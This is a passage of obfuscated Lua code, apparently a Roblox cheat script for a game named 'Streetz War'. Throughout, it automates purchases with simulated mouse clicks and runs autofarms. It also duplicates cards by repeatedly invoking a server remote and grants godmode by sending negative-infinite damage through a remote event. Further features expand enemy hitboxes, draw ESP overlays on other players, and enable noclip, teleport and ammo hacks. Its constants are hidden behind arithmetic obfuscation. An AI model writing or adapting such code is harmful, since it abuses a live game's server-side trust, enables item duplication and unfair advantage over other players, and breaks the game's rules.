);mousemoveabs(v583.AbsolutePosition.X,v583.AbsolutePosition.Y);v582:SendMouseButtonEvent(v583.AbsolutePosition.X,v583.AbsolutePosition.Y,0 -0 ,true,game,0 + 0 );wait();v582:SendMouseButtonEvent(v583.AbsolutePosition.X,v583.AbsolutePosition.Y,1236 -(298 + 938) ,false,game,1259 -(233 + 1026) );v583.Size=UDim2.new(1666 -(636 + 1030) ,0 + 0 ,0 + 0 ,0 + 0 );game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame.exit.Position=v583.Position;v583:Destroy();local v583=game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame.exit;v583.Size=UDim2.new(1 + 9 ,221 -(55 + 166) , -(2 + 8),0 + 0 );local v587=v583.AbsolutePosition.Y;local v588=v583.AbsolutePosition.X;mousemoveabs(v588,v587);v582:SendMouseButtonEvent(v588,v587,0 -0 ,true,game,297 -(36 + 261) );wait();v582:SendMouseButtonEvent(v588,v587,0,false,game,0 -0 );return;elseif (v270=="Balaclava") then local v655=1368 -(34 + 1334) ;local v656;local v657;local v658;local v659;while true do if (v655==0) then fireclickdetector(game.Workspace["Streetz War"].IllegalDealer.ClickDetector);game.Players.LocalPlayer.PlayerGui:WaitForChild("DealerGui");game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame.Visible=true;v655=1 + 0 ;end if (v655==4) then v657.Size=UDim2.new(0 + 0 ,0,1283 -(1035 + 248) ,21 -(20 + 1) );game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame.exit.Position=v657.Position;v657:Destroy();v655=3 + 2 ;end if (v655==6) then v658=v657.AbsolutePosition.Y;v659=v657.AbsolutePosition.X;mousemoveabs(v659,v658);v655=7;end if (v655==(327 -(134 + 185))) then return;end if (1==v655) then game.Players.LocalPlayer.PlayerGui.DealerGui.Frame.Visible=false;v656=game:GetService("VirtualInputManager");v657=game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame:GetChildren()[1148 -(549 + 584) ];v655=2;end if (v655==7) then v656:SendMouseButtonEvent(v659,v658,0,true,game,685 -(314 + 371) );wait();v656:SendMouseButtonEvent(v659,v658,0,false,game,0 -0 );v655=976 -(478 + 490) ;end if (v655==(2 + 1)) then v656:SendMouseButtonEvent(v657.AbsolutePosition.X,v657.AbsolutePosition.Y,1172 -(786 + 386) ,true,game,0 -0 );wait();v656:SendMouseButtonEvent(v657.AbsolutePosition.X,v657.AbsolutePosition.Y,1379 -(1055 + 324) ,false,game,0);v655=4;end if (5==v655) then v657=game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame.exit;v657.Size=UDim2.new(1350 -(1093 + 247) ,0 + 0 , -(2 + 8),0 -0 );v657.Position=UDim2.new(0.254892468 -0 ,0 -0 ,0.932652116,0 -0 );v655=3 + 3 ;end if ((7 -5)==v655) then v657.Size=UDim2.new(34 -24 ,0 + 0 , -10,0 -0 );v657.Position=UDim2.new((688.2 -(364 + 324)) -(150479884 -95587416) ,0 -0 ,0.932652116 + 0 ,0 -0 );mousemoveabs(v657.AbsolutePosition.X,v657.AbsolutePosition.Y);v655=3;end end elseif ((v270=="Spraypaint") or (v270=="C4") or (v270=="Flashlight") or (v270=="Lockpick") or (v270=="Money Flex") or (v270=="Dufflebag")) then fireclickdetector(game.Workspace["Streetz War"].IllegalDealer.ClickDetector);game.Players.LocalPlayer.PlayerGui:WaitForChild("DealerGui");game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame.Visible=true;game.Players.LocalPlayer.PlayerGui.DealerGui.Frame.Visible=false;local v727=game:GetService("VirtualInputManager");local v728=game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame:FindFirstChild(v270);v728.Size=UDim2.new(16 -6 ,0 -0 , -10,1268 -(1249 + 19) );v728.Position=UDim2.new(0.254892468,0,0.932652116 + 0 ,0 -0 );mousemoveabs(v728.AbsolutePosition.X,v728.AbsolutePosition.Y);v727:SendMouseButtonEvent(v728.AbsolutePosition.X,v728.AbsolutePosition.Y,1086 -(686 + 400) ,true,game,0);wait();v727:SendMouseButtonEvent(v728.AbsolutePosition.X,v728.AbsolutePosition.Y,0 + 0 ,false,game,229 -(73 + 156) );print("asd");v728.Size=UDim2.new(0 + 0 ,811 -(721 + 90) ,0 + 0 ,0);game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame.exit.Position=v728.Position;v728:Destroy();local v728=game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame.exit;v728.Size=UDim2.new(32 -22 ,0, -10,470 -(224 + 246) );local v732=v728.AbsolutePosition.Y;local v733=v728.AbsolutePosition.X;mousemoveabs(v733,v732);v727:SendMouseButtonEvent(v733,v732,0 -0 ,true,game,0 -0 );wait();v727:SendMouseButtonEvent(v733,v732,0 + 0 ,false,game,0 + 0 );return;else for v774,v775 in pairs(game.Workspace.GunShop.Slots:GetDescendants()) do if (v270~=nil) then if (v775.Name==v270) then local v817=0;while true do if (v817==(0 + 0)) then v267=true;v268=v775;break;end end end end end if v267 then local v788=0;local v789;local v790;while true do if (v788==1) then v268.Parent.MainPart.ProximityPrompt.RequiresLineOfSight=false;repeat game.Workspace.Camera.CameraType=Enum.CameraType.Scriptable;task.wait(0.5 -0 );until game.Workspace.Camera.CameraType==Enum.CameraType.Scriptable  v790=nil;function v790(v852) local v853=0;local v854;local v855;local v856;while true do if (v853==(3 -2)) then v856=CFrame.new(v854 + Vector3.new(0,5, -(514 -(203 + 310))) ,v854);v855.CFrame=v856;break;end if (v853==(1993 -(1238 + 755))) then v854=v852.Position;v855=game.Workspace.CurrentCamera;v853=1 + 0 ;end end end v788=1536 -(709 + 825) ;end if (v788==(0 -0)) then v789=game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame;game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=v268.Parent.MainPart.CFrame;wait(0.2 -0 );v268.Parent.MainPart.ProximityPrompt.MaxActivationDistance=874 -(196 + 668) ;v788=3 -2 ;end if (v788==3) then repeat local v857=0;while true do if (v857==(0 -0)) then game.Workspace.Camera.CameraType=Enum.CameraType.Custom;task.wait(0.5);break;end end until game.Workspace.Camera.CameraType==Enum.CameraType.Custom  game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=v789;break;end if (v788==(835 -(171 + 662))) then v790(v268.Parent.MainPart);wait(2);fireproximityprompt(v268.Parent.MainPart.ProximityPrompt,v268.Parent.MainPart.ProximityPrompt.HoldDuration + 0.2 );wait(v268.Parent.MainPart.ProximityPrompt.HoldDuration + (93.2 -(4 + 89)) );v788=3;end end end end end end);local v273=v256.new_sector("Players","Right");local v274=17524 -12524 ;local v275="public";local v276=1821 + 3179 ;local v277="";local v278=nil;local v279=v273.element("TextBox","Player Name",nil,function(v340) v278=v340.Text;end);local v280=v273.element("Button","Teleport",false,function(v342) if (v278~=nil) then local v484=game.Players:FindFirstChild(v278);game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=v484.Character.HumanoidRootPart.CFrame;end end);local v281;local function v282() local v343={};for v440,v441 in pairs(game.Workspace.MapsLocations:GetChildren()) do if (v441:FindFirstChild("BillboardGui") and v441.BillboardGui:FindFirstChild("Main") and v441.BillboardGui.Main:FindFirstChild("Emoji")) then local v533=v441.BillboardGui.Main.Emoji.Text;table.insert(v343,v533);end end local v344=v266.element("Dropdown","Location",{options=v343},function(v442) for v487,v488 in pairs(game.Workspace.MapsLocations:GetChildren()) do if (v488:FindFirstChild("BillboardGui") and v488.BillboardGui:FindFirstChild("Main") and v488.BillboardGui.Main:FindFirstChild("Emoji")) then local v589=v488.BillboardGui.Main.Emoji.Text;if (v589==v442.Dropdown) then v281=v488;break;end end end end);end v282();local v280=v266.element("Button","Teleport",false,function(v345) if (v281~=nil) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=v281.CFrame;else local v491=Notif:Notify("You need to choose a location!",8 -6 ,"information");end end);local v283=v262.element("Slider","WalkSpeed",{default={min=1 + 0 ,max=1566 -(35 + 1451) ,default=1458 -(28 + 1425) }},function(v346) local v347=0;while true do if (v347==1) then game.Players.LocalPlayer.Character.Humanoid.WalkSpeed=_G.desiredwalkspeed;break;end if (v347==(1993 -(941 + 1052))) then _G.desiredwalkspeed=v346.Slider;game.Players.LocalPlayer.Character.Humanoid:GetPropertyChangedSignal("WalkSpeed"):Connect(function() if (game.Players.LocalPlayer.Character.Humanoid.WalkSpeed~=_G.desiredwalkspeed) then game.Players.LocalPlayer.Character.Humanoid.WalkSpeed=_G.desiredwalkspeed;end end);v347=1;end end end);local v284=v262.element("Slider","JumpPower",{default={min=1 + 0 ,max=500,default=1554 -(822 + 692) }},function(v348) local v349=0 -0 ;while true do if (v349==1) then game.Players.LocalPlayer.Character.Humanoid.JumpPower=_G.desiredjumppower;break;end if (v349==(0 + 0)) then _G.desiredjumppower=v348.Slider;game.Players.LocalPlayer.Character.Humanoid:GetPropertyChangedSignal("JumpPower"):Connect(function() if (game.Players.LocalPlayer.Character.Humanoid.JumpPower~=_G.desiredjumppower) then game.Players.LocalPlayer.Character.Humanoid.JumpPower=_G.desiredjumppower;end end);v349=1;end end end);local v285=v262.element("Toggle","Flying",false,function(v350) _G.flying=v350.Toggle;if v350.Toggle then local v492=Notif:Notify("Fly Started",299 -(45 + 252) ,"information");else local v493=Notif:Notify("Fly Stopped",2 + 0 ,"information");end end);local v285=v258.element("Toggle","Mop Autofarm",false,function(v352) local v353=0;while true do if (v353==0) then _G.automopfarm=v352.Toggle;while _G.automopfarm do for v624,v625 in pairs(game.Workspace.CleanPart:GetChildren()) do if (v625.ProximityPrompt.Enabled==true) then v625.ProximityPrompt.HoldDuration=1 + 0 ;game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=v625.CFrame;wait(0.1 -0 );fireproximityprompt(v625.ProximityPrompt,v625.ProximityPrompt.HoldDuration,false);wait(v625.ProximityPrompt.HoldDuration + 0.2 + (435 -(114 + 319)) );end end end break;end end end);local v285=v258.element("Toggle","Box Autofarm",false,function(v354) _G.autoboxfarm=v354.Toggle;task.spawn(function() print("Boxing coroutine started");while _G.autoboxfarm do local v494=game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame;game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=game.Workspace.Job.Box.BOX1.CFrame;wait(0.1);fireclickdetector(game.Workspace.Job.Box.BOX1.ClickDetector);wait(0.1);game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=v494;game.Players.LocalPlayer.Backpack:WaitForChild("Box").Parent=game.Players.LocalPlayer.Character;firetouchinterest(game.Workspace.Job.Box.Job,game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Handle,0);wait();firetouchinterest(game.Workspace.Job.Box.Job,game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Handle,1 -0 );wait(19 -4 );print("Boxing task done");wait(0.1);end print("Boxing coroutine stopped");end);end);local v286=v258.element("Toggle","Card Autofarm",false,function(v356) _G.cardautofarm=v356.Toggle;while _G.cardautofarm do local v443=0;local v444;local v445;while true do if (v443==(4 + 2)) then wait();v444:SendMouseButtonEvent(v445.AbsolutePosition.X,v445.AbsolutePosition.Y,0 -0 ,false,game,0 -0 );game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -5.82215214,58.6855545,2140.927963 -(556 + 1407) ,1206.758703411 -(741 + 465) , -1.903834e-8, -(465.65143621 -(170 + 295)),4.844201e-9 + 0 ,1, -2.358332e-8,0.65143621 + 0 ,1.4737058e-8,0.758703411 -0 );wait(0.5 + 0 );wait(4);v443=5 + 2 ;end if (v443==(4 + 3)) then game.Players.LocalPlayer.Backpack.Laptop.Parent=game.Players.LocalPlayer.Character;wait(1230.2 -(957 + 273) );spawn(function() local v626=0 + 0 ;local v627;while true do if (v626==(0 + 0)) then v627={[3 -2 ]=true,[5 -3 ]="NEW123"};game:GetService("ReplicatedStorage"):WaitForChild("Assets"):WaitForChild("Other"):WaitForChild("GiverPunchmade"):InvokeServer(unpack(v627));break;end end end);wait(5 -3 );spawn(function() local v628=0 -0 ;local v629;while true do if (v628==(1780 -(389 + 1391))) then v629={[1 + 0 ]=false,[1 + 1 ]="NEW123"};game:GetService("ReplicatedStorage"):WaitForChild("Assets"):WaitForChild("Other"):WaitForChild("GiverPunchmade"):InvokeServer(unpack(v629));break;end end end);v443=8;end if (v443==(0 -0)) then wait(952 -(783 + 168) );fireclickdetector(game.Workspace["Streetz War"].Anonymous.ClickDetector);game.Players.LocalPlayer.PlayerGui:WaitForChild("DealerGui");game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame.Visible=true;game.Players.LocalPlayer.PlayerGui.DealerGui.Frame.Visible=false;v443=3 -2 ;end if (v443==(8 + 0)) then wait(313 -(309 + 2) );break;end if (v443==(12 -8)) then task.wait(0.1);mousemoveabs(v445.AbsolutePosition.X,v445.AbsolutePosition.Y);v444:SendMouseButtonEvent(v445.AbsolutePosition.X,v445.AbsolutePosition.Y,0,true,game,1212 -(1090 + 122) );wait();v444:SendMouseButtonEvent(v445.AbsolutePosition.X,v445.AbsolutePosition.Y,0,false,game,0 + 0 );v443=16 -11 ;end if ((1 + 0)==v443) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(1173.2443771 -(628 + 490)),1.5702786399999997 + 3 ,420.608994 -250 , -(0.15382807 -0), -(774.000000084242 -(431 + 343)), -(0.988097608 -0),7.3658217e-9 -0 ,1 + 0 , -(8.640338e-8 + 0),1695.988097608 -(556 + 1139) , -(15.000000020569416 -(6 + 9)), -(0.15382807 + 0));wait(0.5);v444=game:GetService("VirtualInputManager");v445=game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame["Blank Card"];v445.Size=UDim2.new(10,0 + 0 , -10,0);v443=171 -(28 + 141) ;end if ((2 + 1)==v443) then v444:SendMouseButtonEvent(v445.AbsolutePosition.X,v445.AbsolutePosition.Y,0 -0 ,false,game,0);v445.Size=UDim2.new(0 + 0 ,1317 -(486 + 831) ,0,0 -0 );v445=game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame['laptop'];v445.Size=UDim2.new(35 -25 ,0 + 0 , -10,0 -0 );wait(1265 -(668 + 595) );v443=4 + 0 ;end if (v443==(1 + 1)) then wait(0.5 -0 );task.wait(290.1 -(23 + 267) );mousemoveabs(v445.AbsolutePosition.X,v445.AbsolutePosition.Y);v444:SendMouseButtonEvent(v445.AbsolutePosition.X,v445.AbsolutePosition.Y,1944 -(1129 + 815) ,true,game,387 -(371 + 16) );wait();v443=3;end if (v443==5) then v445.Size=UDim2.new(1750 -(1326 + 424) ,0 -0 ,0,0 -0 );v445=game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame.exit;v445.Size=UDim2.new(128 -(88 + 30) ,771 -(720 + 51) , -(22 -12),0);mousemoveabs(v445.AbsolutePosition.X,v445.AbsolutePosition.Y);v444:SendMouseButtonEvent(v445.AbsolutePosition.X,v445.AbsolutePosition.Y,1776 -(421 + 1355) ,true,game,0 -0 );v443=6;end end end end);local v287=nil;local v288=v259.element("TextBox","Dupe Amount",nil,function(v358) cardamount5=tonumber(v358.Text);end);local v285=v259.element("Button","Dupe Cards",false,function(v359) local v360=0 + 0 ;while true do if (0==v360) then if (cardamount5~=nil) then local v630=0;local v631;local v632;local v633;local v634;local v635;local v636;while true do if (v630==(1089 -(286 + 797))) then wait(14 -10 );v635=0 -0 ;for v776,v777 in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do if (v777.Name=="Laptop") then v635=v635 + (440 -(397 + 42)) ;end end v630=7;end if ((1 + 1)==v630) then v631=game:GetService("VirtualInputManager");v632=game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame["Blank Card"];v633=game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame['laptop'];v630=803 -(24 + 776) ;end if (v630==(13 -4)) then for v778=1,v636 do spawn(function() local v791={[786 -(222 + 563) ]=false,[3 -1 ]="NEW123"};game:GetService("ReplicatedStorage"):WaitForChild("Assets"):WaitForChild("Other"):WaitForChild("GiverPunchmade"):InvokeServer(unpack(v791));end);end break;end if (v630==(1 + 0)) then game.Players.LocalPlayer.PlayerGui.DealerGui.Frame.Visible=false;game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -55.2443771,194.57027864 -(23 + 167) ,1968.608994 -(690 + 1108) , -(0.15382807 + 0), -(8.424191e-8 + 0), -(848.988097608 -(40 + 808)),7.3658217e-9 + 0 ,1, -(8.640338e-8 -0),0.988097608 + 0 , -2.0569416e-8, -(0.15382807 + 0));wait(0.5);v630=2;end if (v630==4) then wait();v634=game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame.exit;v631:SendMouseButtonEvent(v634.AbsolutePosition.X + 3 + 2 ,v634.AbsolutePosition.Y + (616 -(47 + 524)) ,0 + 0 ,true,game,0 -0 );v630=5;end if (v630==(4 -1)) then game:GetService("RunService"):Set3dRenderingEnabled(false);for v779=2 -1 ,cardamount5 * (1727.3 -(1165 + 561))  do task.wait();v631:SendMouseButtonEvent(v632.AbsolutePosition.X + 5 ,v632.AbsolutePosition.Y + 70 ,0 + 0 ,true,game,0);task.wait();v631:SendMouseButtonEvent(v632.AbsolutePosition.X + 5 ,v632.AbsolutePosition.Y + (216 -146) ,0 + 0 ,false,game,479 -(341 + 138) );task.wait();v631:SendMouseButtonEvent(v633.AbsolutePosition.X + 2 + 3 ,v633.AbsolutePosition.Y + (144 -74) ,326 -(89 + 237) ,true,game,0 -0 );task.wait();v631:SendMouseButtonEvent(v633.AbsolutePosition.X + 5 ,v633.AbsolutePosition.Y + (147 -77) ,0,false,game,881 -(581 + 300) );end game:GetService("RunService"):Set3dRenderingEnabled(true);v630=4;end if (v630==5) then wait();v631:SendMouseButtonEvent(v634.AbsolutePosition.X + (1225 -(855 + 365)) ,v634.AbsolutePosition.Y + (106 -61) ,0 + 0 ,false,game,1235 -(1030 + 205) );game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(954.698547,4.71228409 + 0 , -(57.4266853 + 4),0.999067187,9.484385e-8, -(286.0431831107 -(156 + 130)), -9.681373e-8,2 -1 , -(4.3525684e-8 -0),0.0431831107,4.76658e-8 -0 ,0.999067187 + 0 );v630=6;end if ((0 + 0)==v630) then fireclickdetector(game.Workspace["Streetz War"].Anonymous.ClickDetector);game.Players.LocalPlayer.PlayerGui:WaitForChild("DealerGui");game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame.Visible=true;v630=1;end if (v630==8) then wait(73 -(10 + 59) );v636=0 + 0 ;for v780,v781 in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do if (v781.Name=="Loaded Card") then v636=v636 + 1 ;end end v630=44 -35 ;end if (v630==(1170 -(671 + 492))) then for v782=1 + 0 ,v635-(1216 -(369 + 846))  do spawn(function() local v792=0 + 0 ;local v793;while true do if (v792==(0 + 0)) then v793={[1946 -(1036 + 909) ]=true,[2 + 0 ]="NEW123"};game:GetService("ReplicatedStorage"):WaitForChild("Assets"):WaitForChild("Other"):WaitForChild("GiverPunchmade"):InvokeServer(unpack(v793));break;end end end);end wait(4);game.Players.LocalPlayer.Backpack.Laptop.Parent=game.Players.LocalPlayer.Character;v630=13 -5 ;end end end game.Players.LocalPlayer.Character.Humanoid:UnequipTools();break;end end end);local v289=v262.element("Toggle","Noclip",false,function(v361) local v362=203 -(11 + 192) ;while true do if (v362==1) then while _G.noclip do local v602=0 + 0 ;local v603;while true do if (v602==1) then if v603 then for v794,v795 in pairs(v603:GetDescendants()) do if v795:IsA("BasePart") then v795.CanCollide=false;end end end break;end if (v602==(175 -(135 + 40))) then game:GetService("RunService").RenderStepped:wait();v603=game.Players.LocalPlayer.Character;v602=1;end end end break;end if (v362==(0 -0)) then _G.noclip=v361.Toggle;if  not _G.noclip then local v637=game.Players.LocalPlayer.Character;if v637 then for v743,v744 in pairs(v637:GetDescendants()) do if (v744:IsA("BasePart") and (v744.Parent.Name~="Wings")) then v744.CanCollide=true;end end end end v362=1;end end end);local v290=v262.element("Button","Disable Jump Cooldown",false,function(v363) local v364=false;game:GetService("UserInputService").JumpRequest:Connect(function() if  not v364 then local v540=0 + 0 ;while true do if (v540==(0 -0)) then v364=true;game.Players.LocalPlayer.Character.Humanoid:ChangeState(Enum.HumanoidStateType.Jumping);v540=1 -0 ;end if (v540==(177 -(50 + 126))) then wait(0.5 -0 );v364=false;break;end end end end);end);local v290=v262.element("Button","Remove Limbs",false,function(v365) local v366=0 + 0 ;local v367;local v368;local v369;local v370;local v371;local v372;while true do if (v366==(1413 -(1233 + 180))) then v367=game.Players.LocalPlayer;v368=v367.Character or v367.CharacterAdded:Wait() ;v369=v368:WaitForChild("HumanoidRootPart");v370=v368:FindFirstChild("Humanoid");v366=970 -(522 + 447) ;end if (v366==1) then if v370 then game:GetService("ReplicatedStorage").Ragdoll:FireServer(true);game.Players.LocalPlayer.Character.Humanoid.Jump=true;v370:ChangeState(Enum.HumanoidStateType.Ragdoll);workspace.sw2accountmod.Humanoid.RequiresNeck=false;end v371=v369.Position;v369.CFrame=CFrame.new(v371.X,v371.Y + (6421 -(107 + 1314)) ,v371.Z);v372=v368:FindFirstChild("RagdollConstraints");v366=1 + 1 ;end if (v366==(5 -3)) then if v372 then for v662,v663 in ipairs(v372:GetChildren()) do if (v663:IsA("HingeConstraint") or v663:IsA("BallSocketConstraint")) then v663.Enabled=false;end end end wait(2);v369.CFrame=CFrame.new(v371);v367.Character:FindFirstChildWhichIsA("Humanoid"):ChangeState(Enum.HumanoidStateType.Jumping);break;end end end);local v280=v262.element("Button","Godmode",false,function(v373) game.Players.LocalPlayer.Backpack:WaitForChild("Fist").Script.egma:FireServer(game.Players.LocalPlayer.Character.UpperTorso, -math.huge,game.Players.LocalPlayer.Character.RightHand);wait(0.5);local v374=Notif:Notify("New Health: "   .. tostring(game.Players.LocalPlayer.Character.Humanoid.Health) ,4,"information");end);local v291=v261.element("Slider","Ammo",{default={min=1 + 0 ,max=19858 -9858 ,default=19783 -14783 }},function(v375) v276=v375.Slider;local v377=game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool");if v377 then if v377:FindFirstChild("Stuff") then local v604=0;while true do if (v604==(1911 -(716 + 1194))) then v377.Stuff.Values.CurrentAmmo.MinValue=0 + 0 ;v377.Stuff.Values.StoredAmmo.MinValue=0;v604=1 + 1 ;end if (v604==2) then v377.Stuff.Values.CurrentAmmo.Value=v276;v377.Stuff.Values.StoredAmmo.Value=v276;break;end if (v604==0) then v377.Stuff.Values.CurrentAmmo.MaxValue=100000000000503 -(74 + 429) ;v377.Stuff.Values.StoredAmmo.MaxValue=100000000000000;v604=1 -0 ;end end end end end);local v292=v261.element("Toggle","Tracers",false,function(v378) _G.tracers=v378.Toggle;end);local v293=v261.element("Button","Unlock Firerate",false,function(v380) local v381=0 + 0 ;local v382;while true do if (v381==2) then while _G.FixingName do local v605=0;while true do if ((0 -0)==v605) then wait();if game.Players.LocalPlayer.Character then if game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool") then game.Players.LocalPlayer.PlayerGui.GunUI.GunStats.Weapon.Text="Modded "   .. game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Name ;end end break;end end end break;end if (v381==(1 + 0)) then for v606,v607 in pairs(game.ReplicatedStorage.Assets.Tools:GetChildren()) do local v608=0;local v609;local v610;local v611;while true do if (v608==(0 -0)) then v609=v382:Clone();v609.Parent=game.ReplicatedStorage.Assets.Tools;v608=2 -1 ;end if (v608==(434 -(279 + 154))) then v609.Name=v607.Name;v610=v609:FindFirstChild("Sounds");v608=2;end if (v608==3) then if v611 then v611.Parent=v609;end v607:Destroy();break;end if (v608==(780 -(454 + 324))) then if v610 then v610:Destroy();end v611=v607:FindFirstChild("Sounds");v608=3 + 0 ;end end end _G.FixingName=true;v381=19 -(12 + 5) ;end if (v381==(0 + 0)) then v382=game.ReplicatedStorage.Assets.Tools["Custom GD"];if  not v382 then local v640=0;while true do if (v640==(0 -0)) then warn("reference module not found");return;end end end v381=1;end end end);local v291=v260.element("Slider","HBE",{default={min=2,max=30,default=2}},function(v383) local v384=0 + 0 ;local v385;while true do if ((1093 -(277 + 816))==v384) then v385=v383.Slider;for v612,v613 in pairs(game.Players:GetChildren()) do if (v613.Character and (v613~=game.Players.LocalPlayer)) then if v613.Character:FindFirstChild("HumanoidRootPart") then local v746=0 -0 ;while true do if (v746==(1184 -(1058 + 125))) then v613.Character.HumanoidRootPart.Color=Color3.new(0.3921568627,0.3921568627,1 + 0 );v613.Character.HumanoidRootPart.CanCollide=false;break;end if (v746==0) then v613.Character.HumanoidRootPart.Size=Vector3.new(v385,v385,v385);v613.Character.HumanoidRootPart.Transparency=975.8 -(815 + 160) ;v746=4 -3 ;end end end end end break;end end end);local v294=v260.element("Toggle","ESP",false,function(v386) _G.EspEnabled=v386.Toggle;local v388=game:GetService("Players");local v389=v388.LocalPlayer;local v390=v389.Character or v389.CharacterAdded:Wait() ;local v391=v390:WaitForChild("HumanoidRootPart");local v392=game.CoreGui:FindFirstChild("ESPHolder") or Instance.new("Folder") ;if (_G.EspEnabled==false) then v392:Destroy();end if (v392.Name=="Folder") then local v499=0;while true do if ((0 -0)==v499) then v392.Name="ESPHolder";v392.Parent=game.CoreGui;break;end end end if (_G.EspEnabled==true) then local v500=0;while true do if (v500==(0 + 0)) then _G.EspEnabled=false;_G.EspEnabled=true;break;end end end while _G.EspEnabled do task.wait();for v501,v502 in pairs(v388:GetChildren()) do if (v502.Name~=v389.Name) then local v614=v502.Character;if v614 then local v664=v614:FindFirstChild("HumanoidRootPart");if v664 then local v747=(v391.Position-v664.Position).Magnitude;if (v747<200) then local v797=0 -0 ;local v798;local v799;local v800;local v801;while true do if (v797==(1898 -(41 + 1857))) then v798=v392:FindFirstChild(v502.Name) or Instance.new("Highlight") ;v798.Name=v502.Name;v798.Parent=v392;v798.FillColor=Color3.new(1893.3921568627 -(1222 + 671) ,0.3921568627,2 -1 );v797=1;end if (v797==1) then v798.OutlineColor=Color3.new(0.3921568627,0.3921568627 -0 ,1183 -(229 + 953) );v798.FillTransparency=1774.8 -(1111 + 663) ;v798.OutlineTransparency=0.4;v798.Adornee=v614;v797=1581 -(874 + 705) ;end if (v797==(1 + 2)) then v799.Adornee=v664;v799.Size=UDim2.new(0,200,0 + 0 ,60);v799.StudsOffset=Vector3.new(0,5,0 -0 );v799.AlwaysOnTop=true;v797=1 + 3 ;end if (v797==(685 -(642 + 37))) then v800.TextStrokeTransparency=0;v800.Font=Enum.Font.ArialBold;v801=v614:FindFirstChild("Humanoid");if v801 then local v860=v799:FindFirstChild("HealthLabel") or Instance.new("TextLabel") ;v860.Name="HealthLabel";v860.Parent=v799;v860.Size=UDim2.new(1,0 + 0 ,0.3 + 0 ,0 -0 );v860.Position=UDim2.new(0,0,454.3 -(233 + 221) ,0 -0 );v860.BackgroundTransparency=1 + 0 ;v860.Text="Health: "   .. math.floor(v801.Health) ;v860.TextColor3=Color3.new(1542 -(718 + 823) ,1,1 + 0 );v860.TextStrokeTransparency=805 -(266 + 539) ;v860.Font=Enum.Font.ArialBold;local v871=v799:FindFirstChild("DistanceLabel") or Instance.new("TextLabel") ;v871.Name="DistanceLabel";v871.Parent=v799;v871.Size=UDim2.new(2 -1 ,1225 -(636 + 589) ,0.3,0 -0 );v871.Position=UDim2.new(0,0 -0 ,0.45 + 0 ,0 + 0 );v871.BackgroundTransparency=1016 -(657 + 358) ;v871.Text="Distance: "   .. math.floor(v747) ;v871.TextColor3=Color3.new(2 -1 ,2 -1 ,1188 -(1151 + 36) );v871.TextStrokeTransparency=0;v871.Font=Enum.Font.ArialBold;end break;end if (v797==(2 + 0)) then v798.DepthMode=Enum.HighlightDepthMode.AlwaysOnTop;v799=v392:FindFirstChild("Billboard_"   .. v502.Name ) or Instance.new("BillboardGui") ;v799.Name="Billboard_"   .. v502.Name ;v799.Parent=v392;v797=1 + 2 ;end if (v797==4) then v800=v799:FindFirstChild("NameLabel") or Instance.new("TextLabel") ;v800.Name="NameLabel";v800.Parent=v799;v800.Size=UDim2.new(2 -1 ,1832 -(1552 + 280) ,0.3,834 -(64 + 770) );v797=5;end if (v797==5) then v800.Position=UDim2.new(0 + 0 ,0,0.15 -0 ,0 + 0 );v800.BackgroundTransparency=1;v800.Text=v502.Name;v800.TextColor3=Color3.new(1244 -(157 + 1086) ,1,1 -0 );v797=6;end end else local v802=0 -0 ;local v803;local v804;while true do if (v802==(0 -0)) then v803=v392:FindFirstChild(v502.Name);if v803 then v803:Destroy();end v802=1 -0 ;end if (v802==(820 -(599 + 220))) then v804=v392:FindFirstChild("Billboard_"   .. v502.Name );if v804 then v804:Destroy();end break;end end end end end end end end end);local v295=game.Players.LocalPlayer;local v296=v295.Character or v295.CharacterAdded:Wait() ;local v297=v296:WaitForChild("HumanoidRootPart");local v298=game:GetService("RunService");local v299=11 -5 ;local v300={};local v301=false;local function v302(v393) local v394=1931 -(1813 + 118) ;local v395;local v396;while true do if (v394==(1 + 0)) then for v615=1218 -(841 + 376) ,v393 do local v616=0;local v617;while true do if (v616==0) then v617=math.random(1 -0 , #v395);v396=v396   .. v395:sub(v617,v617) ;break;end end end return v396;end if (v394==0) then v395="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";v396="";v394=1;end end end local function v303() if  not v301 then local v503=0;while true do if ((0 + 0)==v503) then for v665=2 -1 ,889 -(464 + 395)  do local v666=Instance.new("Part");v666.Size=Vector3.new(2 -1 ,1,1 + 0 );v666.Material=Enum.Material.ForceField;v666.Color=Color3.new(837.3921568627 -(467 + 370) ,0.3921568627 -0 